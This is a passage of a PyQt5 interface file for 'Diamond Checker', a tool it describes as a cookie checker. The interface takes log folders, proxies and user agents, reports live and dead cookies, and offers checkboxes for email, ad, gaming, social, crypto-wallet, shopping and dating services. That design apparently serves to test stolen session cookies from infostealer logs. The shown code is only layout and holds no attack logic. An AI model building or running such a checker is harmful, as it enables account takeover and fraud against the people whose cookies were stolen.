self.inbox_tab_widget.setAutoFillBackground(False) + self.inbox_tab_widget.setStyleSheet("QTabWidget::pane { /* The tab widget frame */\n" +" border-top: 2px solid #000000;\n" +" position: absolute;\n" +" top: -0.5em;\n" +"}\n" +"\n" +"QTabWidget::tab-bar {\n" +" alignment: center;\n" +"}\n" +"\n" +"/* Style the tab using the tab sub-control. Note that\n" +" it reads QTabBar _not_ QTabWidget */\n" +"QTabBar::tab {\n" +" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" +" stop: 0 #000000, stop: 0.4 #000000,\n" +" stop: 0.5 #000000, stop: 1.0 #000000);\n" +" border: 2px solid ;\n" +" selection-color: rgb(15, 255, 167);\n" +" border-bottom-color: #000000; /* same as the pane color */\n" +" border-top-left-radius: 12px;\n" +" border-top-right-radius: 12px;\n" +" min-width: 8ex;\n" +" padding: 8px;\n" +"}\n" +"\n" +"QTabBar::tab:selected, QTabBar::tab:hover {\n" +" background: qlineargradient(x1: 0, y1: 0, x2: 0, y2: 1,\n" +" stop: 0 #000000, stop: 0.4 #000000,\n" +" stop: 0.5 #000000, stop: 1.0 #000000);\n" +"}\n" +"\n" +"QTabBar::tab:selected {\n" +" border-color: #00def2;\n" +" border-bottom-color: #00def2; /* same as pane color */\n" +"}") + self.inbox_tab_widget.setTabPosition(QtWidgets.QTabWidget.North) + self.inbox_tab_widget.setTabShape(QtWidgets.QTabWidget.Rounded) + self.inbox_tab_widget.setElideMode(QtCore.Qt.ElideNone) + self.inbox_tab_widget.setMovable(False) + self.inbox_tab_widget.setTabBarAutoHide(False) + self.inbox_tab_widget.setObjectName("inbox_tab_widget") + self.inbox_tab = QtWidgets.QWidget() + self.inbox_tab.setObjectName("inbox_tab") + self.widget = QtWidgets.QWidget(self.inbox_tab) + self.widget.setGeometry(QtCore.QRect(9, 10, 761, 221)) + self.widget.setObjectName("widget") + self.inbox_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget) + self.inbox_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) + self.inbox_checkbox_gridlayout.setObjectName("inbox_checkbox_gridlayout") + self.gmail_inbox_checkbox = QtWidgets.QCheckBox(self.widget) + self.gmail_inbox_checkbox.setEnabled(False) + self.gmail_inbox_checkbox.setObjectName("gmail_inbox_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.gmail_inbox_checkbox, 0, 0, 1, 1) + self.yandex_checkbox = QtWidgets.QCheckBox(self.widget) + self.yandex_checkbox.setEnabled(False) + self.yandex_checkbox.setObjectName("yandex_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.yandex_checkbox, 0, 1, 1, 1) + self.yahoo_checkbox = QtWidgets.QCheckBox(self.widget) + self.yahoo_checkbox.setEnabled(False) + self.yahoo_checkbox.setObjectName("yahoo_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.yahoo_checkbox, 1, 0, 1, 1) + self.outlook_checkbox = QtWidgets.QCheckBox(self.widget) + self.outlook_checkbox.setEnabled(False) + self.outlook_checkbox.setObjectName("outlook_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.outlook_checkbox, 1, 1, 1, 1) + self.webmail_checkbox = QtWidgets.QCheckBox(self.widget) + self.webmail_checkbox.setEnabled(False) + self.webmail_checkbox.setObjectName("webmail_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.webmail_checkbox, 2, 0, 1, 1) + self.mailru_checkbox = QtWidgets.QCheckBox(self.widget) + self.mailru_checkbox.setEnabled(False) + self.mailru_checkbox.setObjectName("mailru_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.mailru_checkbox, 2, 1, 1, 1) + self.cpanel_checkbox = QtWidgets.QCheckBox(self.widget) + self.cpanel_checkbox.setEnabled(False) + self.cpanel_checkbox.setObjectName("cpanel_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.cpanel_checkbox, 3, 0, 1, 1) + self.office_checkbox = QtWidgets.QCheckBox(self.widget) + self.office_checkbox.setEnabled(False) + self.office_checkbox.setObjectName("office_checkbox") + self.inbox_checkbox_gridlayout.addWidget(self.office_checkbox, 3, 1, 1, 1) + self.inbox_tab_widget.addTab(self.inbox_tab, "") + self.ads_tab = QtWidgets.QWidget() + self.ads_tab.setObjectName("ads_tab") + self.widget1 = QtWidgets.QWidget(self.ads_tab) + self.widget1.setGeometry(QtCore.QRect(10, 10, 761, 211)) + self.widget1.setObjectName("widget1") + self.gridLayout_3 = QtWidgets.QGridLayout(self.widget1) + self.gridLayout_3.setContentsMargins(0, 0, 0, 0) + self.gridLayout_3.setObjectName("gridLayout_3") + self.bing_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.bing_ads_checkbox.setEnabled(False) + self.bing_ads_checkbox.setObjectName("bing_ads_checkbox") + self.gridLayout_3.addWidget(self.bing_ads_checkbox, 0, 0, 1, 1) + self.reddit_ads__checkbox = QtWidgets.QCheckBox(self.widget1) + self.reddit_ads__checkbox.setEnabled(False) + self.reddit_ads__checkbox.setObjectName("reddit_ads__checkbox") + self.gridLayout_3.addWidget(self.reddit_ads__checkbox, 0, 1, 1, 1) + self.ahref_checkbox = QtWidgets.QCheckBox(self.widget1) + self.ahref_checkbox.setEnabled(False) + self.ahref_checkbox.setObjectName("ahref_checkbox") + self.gridLayout_3.addWidget(self.ahref_checkbox, 0, 2, 1, 1) + self.snapchat_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.snapchat_ads_checkbox.setEnabled(False) + self.snapchat_ads_checkbox.setObjectName("snapchat_ads_checkbox") + self.gridLayout_3.addWidget(self.snapchat_ads_checkbox, 1, 0, 1, 1) + self.tinder_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.tinder_ads_checkbox.setEnabled(False) + self.tinder_ads_checkbox.setObjectName("tinder_ads_checkbox") + self.gridLayout_3.addWidget(self.tinder_ads_checkbox, 1, 1, 1, 1) + self.twitter_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.twitter_ads_checkbox.setEnabled(False) + self.twitter_ads_checkbox.setObjectName("twitter_ads_checkbox") + self.gridLayout_3.addWidget(self.twitter_ads_checkbox, 1, 2, 1, 1) + self.sem_rush_checkbox = QtWidgets.QCheckBox(self.widget1) + self.sem_rush_checkbox.setEnabled(False) + self.sem_rush_checkbox.setObjectName("sem_rush_checkbox") + self.gridLayout_3.addWidget(self.sem_rush_checkbox, 2, 0, 1, 1) + self.craigslist_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.craigslist_ads_checkbox.setEnabled(False) + self.craigslist_ads_checkbox.setObjectName("craigslist_ads_checkbox") + self.gridLayout_3.addWidget(self.craigslist_ads_checkbox, 3, 0, 1, 1) + self.facebookads__checkbox = QtWidgets.QCheckBox(self.widget1) + self.facebookads__checkbox.setObjectName("facebookads__checkbox") + self.gridLayout_3.addWidget(self.facebookads__checkbox, 3, 1, 1, 1) + self.microsoft_ads_checkbox = QtWidgets.QCheckBox(self.widget1) + self.microsoft_ads_checkbox.setEnabled(False) + self.microsoft_ads_checkbox.setObjectName("microsoft_ads_checkbox") + self.gridLayout_3.addWidget(self.microsoft_ads_checkbox, 2, 2, 1, 1) + self.inbox_tab_widget.addTab(self.ads_tab, "") + self.game_tab = QtWidgets.QWidget() + self.game_tab.setObjectName("game_tab") + self.widget2 = QtWidgets.QWidget(self.game_tab) + self.widget2.setGeometry(QtCore.QRect(10, 10, 761, 201)) + self.widget2.setObjectName("widget2") + self.game_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget2) + self.game_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) + self.game_checkbox_gridlayout.setObjectName("game_checkbox_gridlayout") + self.checkBox_steam = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_steam.setFont(font) + self.checkBox_steam.setStyleSheet("") + self.checkBox_steam.setObjectName("checkBox_steam") + self.game_checkbox_gridlayout.addWidget(self.checkBox_steam, 0, 0, 1, 1) + self.checkBox_pathofexile = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_pathofexile.setFont(font) + self.checkBox_pathofexile.setStyleSheet("") + self.checkBox_pathofexile.setObjectName("checkBox_pathofexile") + self.game_checkbox_gridlayout.addWidget(self.checkBox_pathofexile, 0, 1, 1, 1) + self.checkBox_roblox = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_roblox.setFont(font) + self.checkBox_roblox.setStyleSheet("") + self.checkBox_roblox.setObjectName("checkBox_roblox") + self.game_checkbox_gridlayout.addWidget(self.checkBox_roblox, 1, 0, 1, 1) + self.checkBox_battlenet = QtWidgets.QCheckBox(self.widget2) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_battlenet.setFont(font) + self.checkBox_battlenet.setStyleSheet("") + self.checkBox_battlenet.setObjectName("checkBox_battlenet") + self.game_checkbox_gridlayout.addWidget(self.checkBox_battlenet, 2, 0, 1, 1) + self.inbox_tab_widget.addTab(self.game_tab, "") + self.social_network_tab = QtWidgets.QWidget() + self.social_network_tab.setObjectName("social_network_tab") + self.layoutWidget = QtWidgets.QWidget(self.social_network_tab) + self.layoutWidget.setGeometry(QtCore.QRect(10, 10, 761, 231)) + self.layoutWidget.setObjectName("layoutWidget") + self.gridLayout = QtWidgets.QGridLayout(self.layoutWidget) + self.gridLayout.setContentsMargins(0, 0, 0, 0) + self.gridLayout.setObjectName("gridLayout") + self.checkBox_instagram = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_instagram.setFont(font) + self.checkBox_instagram.setStyleSheet("") + self.checkBox_instagram.setObjectName("checkBox_instagram") + self.gridLayout.addWidget(self.checkBox_instagram, 0, 0, 1, 1) + self.myspace_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.myspace_checkbox.setEnabled(False) + font = QtGui.QFont() + font.setFamily("Arial") + self.myspace_checkbox.setFont(font) + self.myspace_checkbox.setObjectName("myspace_checkbox") + self.gridLayout.addWidget(self.myspace_checkbox, 2, 2, 1, 1) + self.reddit_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.reddit_checkbox.setEnabled(False) + self.reddit_checkbox.setObjectName("reddit_checkbox") + self.gridLayout.addWidget(self.reddit_checkbox, 1, 2, 1, 1) + self.linkedin_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.linkedin_checkbox.setEnabled(False) + self.linkedin_checkbox.setObjectName("linkedin_checkbox") + self.gridLayout.addWidget(self.linkedin_checkbox, 2, 3, 1, 2) + self.checkBox_discord = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_discord.setFont(font) + self.checkBox_discord.setStyleSheet("") + self.checkBox_discord.setObjectName("checkBox_discord") + self.gridLayout.addWidget(self.checkBox_discord, 2, 1, 1, 1) + self.kick_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.kick_checkbox.setObjectName("kick_checkbox") + self.gridLayout.addWidget(self.kick_checkbox, 5, 0, 1, 1) + self.checkBox_facebook_ads = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_facebook_ads.setFont(font) + self.checkBox_facebook_ads.setStyleSheet("") + self.checkBox_facebook_ads.setObjectName("checkBox_facebook_ads") + self.gridLayout.addWidget(self.checkBox_facebook_ads, 0, 2, 1, 1) + self.checkBox_tiktok = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_tiktok.setFont(font) + self.checkBox_tiktok.setStyleSheet("") + self.checkBox_tiktok.setObjectName("checkBox_tiktok") + self.gridLayout.addWidget(self.checkBox_tiktok, 2, 0, 1, 1) + self.twitch_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.twitch_checkbox.setEnabled(False) + self.twitch_checkbox.setObjectName("twitch_checkbox") + self.gridLayout.addWidget(self.twitch_checkbox, 0, 3, 1, 2) + self.pintrest_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.pintrest_checkbox.setEnabled(False) + self.pintrest_checkbox.setObjectName("pintrest_checkbox") + self.gridLayout.addWidget(self.pintrest_checkbox, 1, 0, 1, 1) + self.checkBox_youtube = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_youtube.setFont(font) + self.checkBox_youtube.setStyleSheet("") + self.checkBox_youtube.setObjectName("checkBox_youtube") + self.gridLayout.addWidget(self.checkBox_youtube, 0, 1, 1, 1) + self.vimeo_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.vimeo_checkbox.setObjectName("vimeo_checkbox") + self.gridLayout.addWidget(self.vimeo_checkbox, 5, 1, 1, 1) + self.rumble_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.rumble_checkbox.setEnabled(False) + self.rumble_checkbox.setObjectName("rumble_checkbox") + self.gridLayout.addWidget(self.rumble_checkbox, 5, 2, 1, 1) + self.localsapp_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.localsapp_checkbox.setEnabled(False) + self.localsapp_checkbox.setObjectName("localsapp_checkbox") + self.gridLayout.addWidget(self.localsapp_checkbox, 5, 3, 1, 1) + self.snapchat_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.snapchat_checkbox.setEnabled(False) + self.snapchat_checkbox.setObjectName("snapchat_checkbox") + self.gridLayout.addWidget(self.snapchat_checkbox, 1, 3, 1, 1) + self.patreon_checkbox = QtWidgets.QCheckBox(self.layoutWidget) + self.patreon_checkbox.setEnabled(False) + self.patreon_checkbox.setObjectName("patreon_checkbox") + self.gridLayout.addWidget(self.patreon_checkbox, 5, 4, 1, 1) + self.checkBox_netflix = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_netflix.setFont(font) + self.checkBox_netflix.setStyleSheet("") + self.checkBox_netflix.setObjectName("checkBox_netflix") + self.gridLayout.addWidget(self.checkBox_netflix, 1, 1, 1, 1) + self.checkBox_vk = QtWidgets.QCheckBox(self.layoutWidget) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_vk.setFont(font) + self.checkBox_vk.setStyleSheet("") + self.checkBox_vk.setObjectName("checkBox_vk") + self.gridLayout.addWidget(self.checkBox_vk, 1, 4, 1, 1) + self.inbox_tab_widget.addTab(self.social_network_tab, "") + self.crypto_wallets_tab = QtWidgets.QWidget() + self.crypto_wallets_tab.setObjectName("crypto_wallets_tab") + self.widget3 = QtWidgets.QWidget(self.crypto_wallets_tab) + self.widget3.setGeometry(QtCore.QRect(10, 10, 761, 221)) + self.widget3.setObjectName("widget3") + self.gridLayout_6 = QtWidgets.QGridLayout(self.widget3) + self.gridLayout_6.setContentsMargins(0, 0, 0, 0) + self.gridLayout_6.setObjectName("gridLayout_6") + self.checkBox_coinbase = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_coinbase.setFont(font) + self.checkBox_coinbase.setStyleSheet("") + self.checkBox_coinbase.setObjectName("checkBox_coinbase") + self.gridLayout_6.addWidget(self.checkBox_coinbase, 0, 0, 1, 1) + self.checkBox_kryptex = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_kryptex.setFont(font) + self.checkBox_kryptex.setStyleSheet("") + self.checkBox_kryptex.setObjectName("checkBox_kryptex") + self.gridLayout_6.addWidget(self.checkBox_kryptex, 0, 1, 1, 1) + self.checkBox_hitbtc = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_hitbtc.setFont(font) + self.checkBox_hitbtc.setStyleSheet("") + self.checkBox_hitbtc.setObjectName("checkBox_hitbtc") + self.gridLayout_6.addWidget(self.checkBox_hitbtc, 1, 0, 1, 1) + self.checkBox_freebitcoin = QtWidgets.QCheckBox(self.widget3) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_freebitcoin.setFont(font) + self.checkBox_freebitcoin.setStyleSheet("") + self.checkBox_freebitcoin.setObjectName("checkBox_freebitcoin") + self.gridLayout_6.addWidget(self.checkBox_freebitcoin, 2, 0, 1, 1) + self.inbox_tab_widget.addTab(self.crypto_wallets_tab, "") + self.shopping_tab = QtWidgets.QWidget() + self.shopping_tab.setObjectName("shopping_tab") + self.layoutWidget1 = QtWidgets.QWidget(self.shopping_tab) + self.layoutWidget1.setGeometry(QtCore.QRect(10, 10, 731, 211)) + self.layoutWidget1.setObjectName("layoutWidget1") + self.gridLayout_2 = QtWidgets.QGridLayout(self.layoutWidget1) + self.gridLayout_2.setContentsMargins(0, 0, 0, 0) + self.gridLayout_2.setObjectName("gridLayout_2") + self.checkBox_amazon = QtWidgets.QCheckBox(self.layoutWidget1) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_amazon.setFont(font) + self.checkBox_amazon.setStyleSheet("") + self.checkBox_amazon.setObjectName("checkBox_amazon") + self.gridLayout_2.addWidget(self.checkBox_amazon, 0, 0, 1, 1) + self.ebay_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.ebay_checkbox.setEnabled(False) + self.ebay_checkbox.setObjectName("ebay_checkbox") + self.gridLayout_2.addWidget(self.ebay_checkbox, 0, 1, 1, 1) + self.airbnb_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.airbnb_checkbox.setEnabled(False) + self.airbnb_checkbox.setObjectName("airbnb_checkbox") + self.gridLayout_2.addWidget(self.airbnb_checkbox, 0, 2, 1, 1) + self.envato_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.envato_checkbox.setEnabled(False) + self.envato_checkbox.setObjectName("envato_checkbox") + self.gridLayout_2.addWidget(self.envato_checkbox, 0, 3, 1, 1) + self.flipkart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.flipkart_checkbox.setEnabled(False) + self.flipkart_checkbox.setObjectName("flipkart_checkbox") + self.gridLayout_2.addWidget(self.flipkart_checkbox, 0, 4, 1, 1) + self.checkBox_funpay = QtWidgets.QCheckBox(self.layoutWidget1) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_funpay.setFont(font) + self.checkBox_funpay.setStyleSheet("") + self.checkBox_funpay.setObjectName("checkBox_funpay") + self.gridLayout_2.addWidget(self.checkBox_funpay, 1, 0, 1, 1) + self.kleinanzeigen_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.kleinanzeigen_checkbox.setEnabled(False) + self.kleinanzeigen_checkbox.setObjectName("kleinanzeigen_checkbox") + self.gridLayout_2.addWidget(self.kleinanzeigen_checkbox, 1, 1, 1, 1) + self.booking_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.booking_checkbox.setEnabled(False) + self.booking_checkbox.setObjectName("booking_checkbox") + self.gridLayout_2.addWidget(self.booking_checkbox, 1, 2, 1, 1) + self.uber_eats_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.uber_eats_checkbox.setEnabled(False) + self.uber_eats_checkbox.setObjectName("uber_eats_checkbox") + self.gridLayout_2.addWidget(self.uber_eats_checkbox, 1, 3, 1, 1) + self.dh_gate_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.dh_gate_checkbox.setEnabled(False) + self.dh_gate_checkbox.setObjectName("dh_gate_checkbox") + self.gridLayout_2.addWidget(self.dh_gate_checkbox, 1, 4, 1, 1) + self.checkBox_humble = QtWidgets.QCheckBox(self.layoutWidget1) + font = QtGui.QFont() + font.setFamily("Furore") + self.checkBox_humble.setFont(font) + self.checkBox_humble.setStyleSheet("") + self.checkBox_humble.setObjectName("checkBox_humble") + self.gridLayout_2.addWidget(self.checkBox_humble, 2, 0, 1, 1) + self.temu_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.temu_checkbox.setEnabled(False) + self.temu_checkbox.setObjectName("temu_checkbox") + self.gridLayout_2.addWidget(self.temu_checkbox, 2, 1, 1, 1) + self.fiverr_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.fiverr_checkbox.setEnabled(False) + self.fiverr_checkbox.setObjectName("fiverr_checkbox") + self.gridLayout_2.addWidget(self.fiverr_checkbox, 2, 2, 1, 1) + self.zillow_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.zillow_checkbox.setEnabled(False) + self.zillow_checkbox.setObjectName("zillow_checkbox") + self.gridLayout_2.addWidget(self.zillow_checkbox, 2, 3, 1, 1) + self.instacart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.instacart_checkbox.setEnabled(False) + self.instacart_checkbox.setObjectName("instacart_checkbox") + self.gridLayout_2.addWidget(self.instacart_checkbox, 2, 4, 1, 1) + self.google_play_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.google_play_checkbox.setObjectName("google_play_checkbox") + self.gridLayout_2.addWidget(self.google_play_checkbox, 3, 0, 1, 1) + self.vinted_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.vinted_checkbox.setEnabled(False) + self.vinted_checkbox.setObjectName("vinted_checkbox") + self.gridLayout_2.addWidget(self.vinted_checkbox, 3, 1, 1, 1) + self.walmart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) + self.walmart_checkbox.setEnabled(False) + self.walmart_checkbox.setObjectName("walmart_checkbox") + self.gridLayout_2.addWidget(self.walmart_checkbox, 3, 2, 1, 1) + self.inbox_tab_widget.addTab(self.shopping_tab, "") + self.daiting_tab = QtWidgets.QWidget() + self.daiting_tab.setObjectName("daiting_tab") + self.widget4 = QtWidgets.QWidget(self.daiting_tab) + self.widget4.setGeometry(QtCore.QRect(20, 0, 751, 221)) + self.widget4.setObjectName("widget4") + self.gridLayout_5 = QtWidgets.QGridLayout(self.widget4) + self.gridLayout_5.setContentsMargins(0, 0, 0, 0) + self.gridLayout_5.setObjectName("gridLayout_5") + self.ashley_madison_checkbox = QtWidgets.QCheckBox(self.widget4) + self.ashley_madison_checkbox.setEnabled(False) + self.ashley_madison_checkbox.setObjectName("ashley_madison_checkbox") + self.gridLayout_5.addWidget(self.ashley_madison_checkbox, 0, 0, 1, 1) + self.zoosk_checkbox = QtWidgets.QCheckBox(self.widget4) + self.zoosk_checkbox.setEnabled(False) + self.zoosk_checkbox.setObjectName("zoosk_checkbox") + self.gridLayout_5.addWidget(self.zoosk_checkbox, 0, 1, 1, 1) + self.meetme_checkbox = QtWidgets.QCheckBox(self.widget4) + self.meetme_checkbox.setEnabled(False) + self.meetme_checkbox.setObjectName("meetme_checkbox") + self.gridLayout_5.addWidget(self.meetme_checkbox, 0, 2, 1, 1) + self.eharmony_checkbox = QtWidgets.QCheckBox(self.widget4) + self.eharmony_checkbox.setEnabled(False) + self.eharmony_checkbox.setObjectName("eharmony_checkbox") + self.gridLayout_5.addWidget(self.eharmony_checkbox, 1, 0, 1, 1) + self.tinder_checkbox = QtWidgets.QCheckBox(self.widget4) + self.tinder_checkbox.setEnabled(False) + self.tinder_checkbox.setObjectName("tinder_checkbox") + self.gridLayout_5.addWidget(self.tinder_checkbox, 1, 1, 1, 1) + self.christan_mingle_checkbox = QtWidgets.QCheckBox(self.widget4) + self.christan_mingle_checkbox.setEnabled(False) + self.christan_mingle_checkbox.setObjectName("christan_mingle_checkbox") + self.gridLayout_5.addWidget(self.christan_mingle_checkbox, 1, 2, 1, 1) + self.inbox_tab_widget.addTab(self.daiting_tab, "") + self.number_of_label = QtWidgets.QLabel(self.centralwidget) + self.number_of_label.setGeometry(QtCore.QRect(540, 280, 71, 31)) + self.number_of_label.setObjectName("number_of_label") + self.files_label = QtWidgets.QLabel(self.centralwidget) + self.files_label.setGeometry(QtCore.QRect(540, 310, 71, 31)) + self.files_label.setObjectName("files_label") + self.folders_label = QtWidgets.QLabel(self.centralwidget) + self.folders_label.setGeometry(QtCore.QRect(540, 340, 71, 31)) + self.folders_label.setObjectName("folders_label") + self.cookies_label = QtWidgets.QLabel(self.centralwidget) + self.cookies_label.setGeometry(QtCore.QRect(540, 380, 71, 21)) + self.cookies_label.setObjectName("cookies_label") + self.cookie_stats_label = QtWidgets.QLabel(self.centralwidget) + self.cookie_stats_label.setGeometry(QtCore.QRect(700, 290, 81, 21)) + self.cookie_stats_label.setObjectName("cookie_stats_label") + self.live_label = QtWidgets.QLabel(self.centralwidget) + self.live_label.setGeometry(QtCore.QRect(700, 320, 71, 21)) + self.live_label.setObjectName("live_label") + self.dead_label = QtWidgets.QLabel(self.centralwidget) + self.dead_label.setGeometry(QtCore.QRect(700, 350, 71, 21)) + self.dead_label.setObjectName("dead_label") + self.errors_label = QtWidgets.QLabel(self.centralwidget) + self.errors_label.setGeometry(QtCore.QRect(700, 380, 71, 21)) + self.errors_label.setObjectName("errors_label") + self.stats_box.raise_() + self.lineEdit_dir.raise_() + self.lineEdit_proxy.raise_() + self.lineEdit_ua.raise_() + self.checkBox_ua.raise_() + self.label_2.raise_() + self.pushButton.raise_() + self.progressBar.raise_() + self.pushButton_dir_logs.raise_() + self.pushButton_proxies_files.raise_() + self.pushButton_useragents_file.raise_() + self.textEdit_console.raise_() + self.social_network_label.raise_() + self.spinBox_thr.raise_() + self.label_lgbt.raise_() + self.comboBox_proxy.raise_() + self.inbox_tab_widget.raise_() + self.number_of_label.raise_() + self.files_label.raise_() + self.folders_label.raise_() + self.cookies_label.raise_() + self.cookie_stats_label.raise_() + self.live_label.raise_() + self.dead_label.raise_() + self.errors_label.raise_() + MainWindow.setCentralWidget(self.centralwidget) + self.statusbar = QtWidgets.QStatusBar(MainWindow) + self.statusbar.setObjectName("statusbar") + MainWindow.setStatusBar(self.statusbar) + + self.retranslateUi(MainWindow) + self.inbox_tab_widget.setCurrentIndex(0) + self.pushButton_proxies_files.clicked.connect(MainWindow.proxies_file) # type: ignore + self.pushButton_dir_logs.clicked.connect(MainWindow.dir_logs) # type: ignore + self.pushButton_useragents_file.clicked.connect(MainWindow.useragents_file) # type: ignore + QtCore.QMetaObject.connectSlotsByName(MainWindow) + + def retranslateUi(self, MainWindow): + _translate = QtCore.QCoreApplication.translate + MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) + self.lineEdit_dir.setText(_translate("MainWindow", "The path to the logs")) + self.lineEdit_proxy.setText(_translate("MainWindow", "The path to the proxy")) + self.lineEdit_ua.setText(_translate("MainWindow", "The path to user agents")) + self.checkBox_ua.setText(_translate("MainWindow", "Enable")) + self.pushButton.setText(_translate("MainWindow", "Start")) + self.pushButton_dir_logs.setText(_translate("MainWindow", "Choose a path")) + self.pushButton_proxies_files.setText(_translate("MainWindow", "Choose a path")) + self.pushButton_useragents_file.setText(_translate("MainWindow", "Choose a path")) + self.textEdit_console.setHtml(_translate("MainWindow", "\n" +"\n" +"


")) + self.textEdit_console.setPlaceholderText(_translate("MainWindow", "Diamond Checker - A Cookie Checker Brought To You By DiamondSorter - An Opensourced.Pro Project")) + self.social_network_label.setText(_translate("MainWindow", "Threads")) + self.comboBox_proxy.setItemText(0, _translate("MainWindow", "off")) + self.comboBox_proxy.setItemText(1, _translate("MainWindow", "socks4")) + self.comboBox_proxy.setItemText(2, _translate("MainWindow", "socks5")) + self.comboBox_proxy.setItemText(3, _translate("MainWindow", "http")) + self.gmail_inbox_checkbox.setText(_translate("MainWindow", "Gmail")) + self.yandex_checkbox.setText(_translate("MainWindow", "Yandex")) + self.yahoo_checkbox.setText(_translate("MainWindow", "Yahoo")) + self.outlook_checkbox.setText(_translate("MainWindow", "Outlook")) + self.webmail_checkbox.setText(_translate("MainWindow", "Webmail")) + self.mailru_checkbox.setText(_translate("MainWindow", "Mail.Ru")) + self.cpanel_checkbox.setText(_translate("MainWindow", "Cpanel")) + self.office_checkbox.setText(_translate("MainWindow", "Office")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.inbox_tab), _translate("MainWindow", "Inbox")) + self.bing_ads_checkbox.setText(_translate("MainWindow", "Bing Ads")) + self.reddit_ads__checkbox.setText(_translate("MainWindow", "Reddit Ads")) + self.ahref_checkbox.setText(_translate("MainWindow", "AHref SEO")) + self.snapchat_ads_checkbox.setText(_translate("MainWindow", "Snapchat Ads")) + self.tinder_ads_checkbox.setText(_translate("MainWindow", "Tinder Ads")) + self.twitter_ads_checkbox.setText(_translate("MainWindow", "Twitter Ads")) + self.sem_rush_checkbox.setText(_translate("MainWindow", "SEM Rush")) + self.craigslist_ads_checkbox.setText(_translate("MainWindow", "Craigslist Ads")) + self.facebookads__checkbox.setText(_translate("MainWindow", "Facebook Ads")) + self.microsoft_ads_checkbox.setText(_translate("MainWindow", "Microsoft Ads")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.ads_tab), _translate("MainWindow", "Ads")) + self.checkBox_steam.setText(_translate("MainWindow", "Steam")) + self.checkBox_pathofexile.setText(_translate("MainWindow", "PathofExile")) + self.checkBox_roblox.setText(_translate("MainWindow", "Roblox")) + self.checkBox_battlenet.setText(_translate("MainWindow", "BattleNet")) + self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.game_tab), _translate("MainWindow", "Games")) + self.checkBox_instagram.setText(_translate("MainWindow", "Instagram")) + self.myspace_checkbox.setText(_translate("MainWindow", "Myspace")) + self.reddit_checkbox.setText(_translate("MainWindow", "Reddit")) + self.linkedin_checkbox.setText(_translate("MainWindow", "LinkedIn")) + self.checkBox_discord.setText(_translate("MainWindow", "Discord")) + self.kick_checkbox.setText(_translate("MainWindow", "Kick")) + self.checkBox_facebook_ads.setText(_translate("MainWindow", "Facebook")) + self.checkBox_tiktok.setText(_translate("MainWindow", "TikTok")) + self.twitch_checkbox.setText(_translate("MainWindow", "Twitch")) + self.pintrest_checkbox.setText(_translate("MainWindow", 